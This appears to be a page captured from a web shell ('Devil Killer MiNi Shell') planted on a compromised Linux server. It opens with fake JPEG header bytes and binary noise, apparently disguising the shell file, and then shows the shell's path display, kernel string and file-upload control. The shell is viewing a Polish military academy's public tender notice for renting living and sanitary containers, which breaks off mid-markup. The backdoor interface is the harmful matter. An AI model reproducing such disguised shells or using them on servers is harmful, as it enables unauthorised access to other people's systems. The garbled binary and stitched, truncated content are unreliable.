JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210319/0002048101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00020481 z dnia 2021-03-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wynajem kontenerów mieszkalnych i sanitarnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lotnicza Akademia Wojskowa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Lotnicza Akademia Wojskowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060059216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dywizjonu 303 nr 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261519676</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.kurdzialek@law.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wojsko-polskie.pl/law/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Uczelnia Publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wynajem kontenerów mieszkalnych i sanitarnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a29997ba-88a8-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00020481</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zamowienia.law.mil.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://zamowienia.law.mil.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z załącznikiem nr 5 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z załącznikiem nr 5 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp/tp/2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wynajem kontenerów mieszkalnych wraz z wyposażeniem (kompleks lotniskowy nr 8693 w Nowym Mieście nad Pilicą). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-04-26 do 2021-09-09</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia uszkodzenia/awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji kontenerów/ kabin przenośnych/ umywalek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wynajem przenośnych kabin toaletowych, umywalek oraz kontenerów sanitarnych (zgrupowanie w Nowym Mieście nad Pilicą). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90410000-4 - Usługi usuwania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-04-26 do 2021-09-09</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia uszkodzenia/awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji kontenerów/ kabin przenośnych/ umywalek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wynajem przenośnych kabin toaletowych i umywalek (zgrupowanie w Dęblinie) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-05-04 do 2021-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium „czas przystąpienia do usunięcia uszkodzenia/awarii należy podać pełne godziny (1 godzina = 60 minut).Czas ten będzie liczony od momentu zgłoszenia (tel. e-mail, fax) do przybycia przedstawicieli Wykonawcy do miejsca posadowienia kontenerów w celu usunięcia uszkodzenia/awarii.Maksymalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 36 godzin.Minimalny czas przystąpienia do usunięcia uszkodzenia/awarii wynosi: 5 godzin.Jeżeli Wykonawca zadeklaruje czas przystąpienia do usunięcia uszkodzenia/awarii krótszy niż 5 godzin, Zamawiający przyjmie do oceny minimalny (wymagany) czas 5 godzin, a w przypadku wyboru oferty Wykonawcy czas ten zostanie uwzględniony w umowie.Jeżeli Wykonawca zaoferuje czas przystąpienia do usunięcia uszkodzenia/awarii dłuższy niż 36 godzin albo jeżeli Wykonawca nie poda (nie wpisze) w formularzu cenowym czasu przystąpienia do usunięcia uszkodzenia/awarii, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy, z uwagi na jego wymaganie w tym zakresie zawarte w Opisie przedmiotu zamówienia.Ocenie podlegać będzie rok produkcji poszczególnych kontenerów/kabin przenośnych/umywalek liczony na podstawie informacji podanych w formularzu oferty i weryfikowany w momencie dostawy.Jeżeli Wykonawca nie wskaże roku produkcji kontenerów/kabin przenośnych/umywalek Zamawiający przyzna 0 pkt.Zamawiający, w celu oceny ofert w kryterium „Rok produkcji kontenerów/kabin przenośnych/umywalek” w pierwszej kolejności przyzna odpowiednią ilość punktów za podany rok produkcji danego kontenera/kabiny przenośnej/umywalki. Finalną liczbę punktów w powyższym kryterium będzie stanowiła średnia arytmetyczna z liczby punktów przyznanych podzielona przez ilość kontenerów/kabin przenośnych/umywalek w danym zadaniu. Jeżeli Wykonawca nie wskaże daty produkcji wszystkich kontenerów/kabin przenośnych/umywalek w danym zadaniu Zamawiający obliczy średnią arytmetyczną z tych wskazanych i podzieli przez ilość kontenerów/kabin przenośnych/umywalek podanych w danym zadaniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia uszkodzenia/awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji kontenerów/ kabin przenośnych/ umywalek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 